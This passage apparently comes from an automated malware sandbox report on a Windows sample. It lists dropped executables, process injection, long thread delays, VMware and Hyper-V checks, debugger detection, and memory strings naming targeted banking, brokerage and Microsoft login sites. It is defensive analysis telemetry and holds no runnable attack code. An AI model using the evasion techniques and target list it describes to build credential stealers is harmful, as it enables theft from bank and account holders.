Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900179B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	11_2_00007FF6900179B0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900185A0 FindFirstFileExW,FindClose,	11_2_00007FF6900185A0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690030B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	11_2_00007FF690030B84
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900185A0 FindFirstFileExW,FindClose,	16_2_00007FF6900185A0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900179B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	16_2_00007FF6900179B0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690030B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	16_2_00007FF690030B84
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,	16_2_00007FF8B837303C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,	16_2_00007FF8B8373280
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006CF661 FindFirstFileExW,	18_2_006CF661
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007DF661 FindFirstFileExW,	19_2_007DF661
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007B8430 GetTempPathA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindClose,	20_2_007B8430
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007DF661 FindFirstFileExW,	20_2_007DF661
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_6971BCEE FindFirstFileExW,	29_2_6971BCEE

Source: C:\Windows\explorer.exe

Code function: 4_2_09827B10 GetSystemInfo,VirtualAlloc,VirtualAlloc,

4_2_09827B10

Source: C:\Windows\System32\audiodg.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Windows\explorer.exe	Thread delayed: delay time: 90000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Music\desktop.ini
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local

Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: explorer.exe, 00000004.00000000.2052790919.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000004.00000000.2052790919.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000004.00000000.2047725228.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000004.00000002.3489127190.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2679991024.000001ED567DC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6BBE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6C00000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.3377277785.000000000328F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.3377277785.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3378440733.0000000003427000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: D7AB.tmp.ssg.exe, 00000011.00000002.2653558620.0000000005DF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: Gxtuum.exe, 00000014.00000002.3380715534.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6C0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\PN[
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: ssg.exe, 0000002C.00000002.3006898229.0000000003762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655LRjq
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000004.00000000.2050311869.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000004.00000003.3104504813.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000004.00000000.2052790919.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000004.00000000.2050311869.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: explorer.exe, 00000004.00000000.2050311869.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.3104504813.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: rundll32.exe, 00000018.00000002.2689505871.000001C0C6C0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
Source: ssg.exe, 0000002C.00000002.3006898229.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655LRjqX
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003402000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: netsh.exe, 00000019.00000003.2417796249.0000023CBC004000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001B.00000003.2417865024.0000018F9F854000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: rundll32.exe, 0000001E.00000002.3378440733.0000000003427000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000004.00000003.3104504813.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000004.00000003.3104504813.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: rundll32.exe, 00000016.00000002.2679991024.000001ED56728000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: ssg.exe, 0000002C.00000002.3103931631.0000000004659000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000004.00000000.2047725228.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: ssg.exe, 0000002C.00000002.3103931631.000000000484A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	API call chain: ExitProcess graph end node	graph_0-875
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	API call chain: ExitProcess graph end node	graph_0-877
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	API call chain: ExitProcess graph end node	graph_0-880
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	API call chain: ExitProcess graph end node	graph_0-898
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node	graph_1-879
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node	graph_1-895
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node	graph_1-885
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node	graph_1-884
Source: C:\Windows\System32\svchost.exe	API call chain: ExitProcess graph end node	graph_1-875
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node	graph_4-40057
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	API call chain: ExitProcess graph end node	graph_6-934
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	API call chain: ExitProcess graph end node	graph_6-932
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	API call chain: ExitProcess graph end node	graph_6-953
Source: C:\Windows\System32\audiodg.exe	API call chain: ExitProcess graph end node	graph_8-887
Source: C:\Windows\System32\audiodg.exe	API call chain: ExitProcess graph end node	graph_8-884
Source: C:\Windows\System32\audiodg.exe	API call chain: ExitProcess graph end node	graph_8-874
Source: C:\Windows\System32\audiodg.exe	API call chain: ExitProcess graph end node	graph_8-896
Source: C:\Windows\System32\msiexec.exe	API call chain: ExitProcess graph end node	graph_9-893
Source: C:\Windows\System32\msiexec.exe	API call chain: ExitProcess graph end node	graph_9-897
Source: C:\Windows\System32\msiexec.exe	API call chain: ExitProcess graph end node	graph_9-901

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Code function: 0_2_00007FF79E38321C IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,

0_2_00007FF79E38321C

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep	graph_6-1186
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep	graph_0-1131
Source: C:\Windows\System32\audiodg.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep	graph_8-1129
Source: C:\Windows\System32\svchost.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep	graph_1-1128
Source: C:\Windows\System32\msiexec.exe	Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep	graph_9-1144

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process queried: DebugPort	Jump to behavior
